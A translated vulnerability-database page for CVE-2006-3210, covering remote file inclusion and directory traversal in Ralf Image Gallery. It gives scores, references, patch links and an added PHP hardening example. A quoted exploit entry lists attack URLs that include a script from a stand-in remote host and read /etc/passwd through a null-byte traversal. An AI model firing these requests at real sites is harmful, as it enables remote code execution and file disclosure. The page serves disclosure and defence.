CVE-2006-3210
CVSS 5.1
Published: 2006-06-23 21:06:00
Revised: 2011-08-10 00:00:00
NMCOE    

[Original] Ralf Image Gallery (RIG) 0.7.4 and other versions before 1.0, when register_globals is enabled, allows remote attackers to conduct PHP remote file inclusion and directory traversal attacks via URLs or ".." sequences in the (1) dir_abs_src parameter in (a) check_entry.php, (b) admin_album.php, (c) admin_image.php, and (d) admin_util.php; and the (2) dir_abs_admin_src parameter in admin_album.php and admin_image.php. NOTE: this issue can be leveraged to conduct cross-site scripting (XSS) attacks.


[CNNVD] Ralf Image Gallery Multiple PHP Remote File Inclusion and Directory Traversal Vulnerabilities (CNNVD-200606-466)

        When register_globals is enabled, Ralf Image Gallery (RIG) allows remote attackers to conduct PHP remote file inclusion and directory traversal attacks via URLs or ".." sequences in (1) the dir_abs_src parameter in (a) check_entry.php, (b) admin_album.php, (c) admin_image.php and (d) admin_util.php, and (2) the dir_abs_admin_src parameter in admin_album.php and admin_image.php. Note: this issue can be leveraged to conduct cross-site scripting (XSS) attacks.

- CVSS (Base Score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: HIGH [exploitation requires specific access conditions]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (Weakness Category)

CWE-94 [Improper Control of Generation of Code (Code Injection)]

- CPE (Affected Platforms and Products)

cpe:/a:le_ralf:ralf_image_gallery:0.7.3
cpe:/a:le_ralf:ralf_image_gallery:0.7.2
cpe:/a:le_ralf:ralf_image_gallery:0.7.1
cpe:/a:le_ralf:ralf_image_gallery:0.6.5
cpe:/a:le_ralf:ralf_image_gallery:0.7.5
cpe:/a:le_ralf:ralf_image_gallery:0.7.4
cpe:/a:le_ralf:ralf_image_gallery:0.7

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3210
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3210
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-466
(official data source) CNNVD

- Other Links and Resources

http://secunia.com/advisories/20771
(VENDOR_ADVISORY)  SECUNIA  20771
http://xforce.iss.net/xforce/xfdb/27259
(UNKNOWN)  XF  rig-dirabssrc-dirabsadminsrc-file-include(27259)
http://xforce.iss.net/xforce/xfdb/27257
(UNKNOWN)  XF  rig-dirabssrc-dirabsadminsrc-xss(27257)
http://xforce.iss.net/xforce/xfdb/27256
(UNKNOWN)  XF  rig-dirabssrc-directory-traversal(27256)
http://www.vupen.com/english/advisories/2006/2477
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2477
http://www.securityfocus.com/bid/18548
(UNKNOWN)  BID  18548
http://www.securityfocus.com/archive/1/archive/1/438645/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060627 Re: [MajorSecurity #18] Ralf Image Gallery <=0.7.4 - Multiple XSS, Remote File Include and directory traversal vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/437818/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060620 [MajorSecurity #18] Ralf Image Gallery <=0.7.4 - Multiple XSS, Remote File Include and directory traversal vulnerabilities
http://www.osvdb.org/26756
(UNKNOWN)  OSVDB  26756
http://www.osvdb.org/26755
(UNKNOWN)  OSVDB  26755
http://www.osvdb.org/26754
(UNKNOWN)  OSVDB  26754
http://www.osvdb.org/26753
(UNKNOWN)  OSVDB  26753
http://www.majorsecurity.de/advisory/major_rls18.txt
(UNKNOWN)  MISC  http://www.majorsecurity.de/advisory/major_rls18.txt
http://securityreason.com/securityalert/1136
(UNKNOWN)  SREASON  1136
http://rig.powerpulsar.com/#news
(UNKNOWN)  CONFIRM  http://rig.powerpulsar.com/#news

- Vulnerability Information

Ralf Image Gallery Multiple PHP Remote File Inclusion and Directory Traversal Vulnerabilities
Medium  Cross-site scripting
2006-06-23 00:00:00 2007-08-01 00:00:00
Remote
        When register_globals is enabled, Ralf Image Gallery (RIG) allows remote attackers to conduct PHP remote file inclusion and directory traversal attacks via URLs or ".." sequences in (1) the dir_abs_src parameter in (a) check_entry.php, (b) admin_album.php, (c) admin_image.php and (d) admin_util.php, and (2) the dir_abs_admin_src parameter in admin_album.php and admin_image.php. Note: this issue can be leveraged to conduct cross-site scripting (XSS) attacks.

- Advisories and Patches

        The vendor has released a patch; download it from the vendor's homepage:
        Ralf Image Gallery RIG 0.6.5
        Ralf Image Gallery rig_2006-06-24_v10.tgz
        http://prdownloads.sourceforge.net/rig-thumbnail/rig_2006-06-24_v10.tgz?download
        Ralf Image Gallery RIG 0.7.4
        Ralf Image Gallery rig_2006-06-24_v10.tgz
        http://prdownloads.sourceforge.net/rig-thumbnail/rig_2006-06-24_v10.tgz?download
        Ralf Image Gallery RIG 0.7.5
        Ralf Image Gallery rig_2006-06-24_v10.tgz
        http://prdownloads.sourceforge.net/rig-thumbnail/rig_2006-06-24_v10.tgz?download

- Vulnerability Information (1942)

Ralf Image Gallery <= 0.7.4 Multiple Remote Vulnerabilities (EDBID:1942)
php webapps
2006-06-22 Verified
0 Aesthetico
N/A
Title: Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory
traversal Vulnerabilities
-----------------------------------------------------------------
Vendor: RIG is developed and maintained by Le R'alf
URL: http://rig.powerpulsar.com/
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------

Exploitation:
-----------------------------------------------------------------

/check_entry.php?dir_abs_src=http://www.yourspace.com/yourscript.php?
/check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00
/admin_album.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_image.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_translate.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-22]

- Vulnerability Information

26753
Ralf Image Gallery check_entry.php dir_abs_src Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability Description

Ralf Image Gallery (R.I.G.) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the check_entry.php script not properly sanitizing user input supplied to the 'dir_abs_src' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Additionally, this can be used to access arbitrary files via directory traversal style attacks (../../), or conduct cross-site scripting (XSS) attacks allowing for the execution of arbitrary code in a user's browser within the trust relationship between the browser and the server.
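The root cause described above is an include path that is assembled from a request-controlled variable (dir_abs_src), which register_globals turns into an ordinary PHP variable before the script runs. The following is an added example, not RIG's code and not taken from the advisory: it shows the vulnerable shape of such an include in a hypothetical script and then a hardened resolver that fixes the base directory in configuration, accepts only a plain file name from the request, and confirms the resolved path stays under the base. The file names, the RIG_INCLUDE_BASE constant and the `entry` parameter are assumptions made for the example.

```php
<?php
// Added example; not code from Ralf Image Gallery or from the advisory.
// File names, the constant and the request parameter are illustrative.

// --- Vulnerable shape (illustrative) ---
// With register_globals=On, the request parameter dir_abs_src already exists
// as $dir_abs_src when this function's caller runs, so the request decides
// what gets included: a URL (remote inclusion) or a "../" path (traversal).
function vulnerable_include_path(string $dir_abs_src): string
{
    return $dir_abs_src . 'check_entry_helper.php';   // hypothetical file
}

// --- Hardened resolver ---
// 1. The base directory comes from configuration, never from the request.
// 2. The request may only name a file; schemes, NUL bytes and separators
//    are rejected before any file-system access.
// 3. realpath() collapses "..", so the prefix check afterwards is meaningful.
const RIG_INCLUDE_BASE = __DIR__ . '/includes';   // assumed location

// Known include targets; an allow-list is the strongest check, so try it first.
const RIG_ALLOWED_INCLUDES = ['check_entry_helper.php', 'album_helper.php'];

function safe_include_path(string $requested, string $base = RIG_INCLUDE_BASE): ?string
{
    // "%00" in a URL decodes to a NUL byte; reject it along with any scheme.
    if ($requested === '' || strpos($requested, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested)) {
        return null;
    }
    // A bare file name only: no slashes, no dots other than the extension.
    if (!preg_match('#^[A-Za-z0-9_-]+\.php$#', $requested)) {
        return null;
    }
    if (!in_array($requested, RIG_ALLOWED_INCLUDES, true)) {
        return null;
    }
    $baseReal  = realpath($base);
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($baseReal === false || $candidate === false) {
        return null;   // base directory or target file does not exist
    }
    // Defence in depth: the resolved file must sit inside the base directory.
    if (strncmp($candidate, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage: read the file name explicitly from $_GET instead of relying on
// register_globals, and refuse the request if the resolver rejects it.
$path = safe_include_path($_GET['entry'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('invalid entry');
}
require $path;
```

Alongside the code change, the server-side settings that made this class of bug reachable should be off: register_globals=Off (the default since PHP 4.2 and removed in PHP 5.4) and allow_url_include=Off (PHP 5.2 and later), so that a stray unvalidated include cannot pull code from a remote host even if one remains.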

- Timeline

2006-06-20 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright Notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites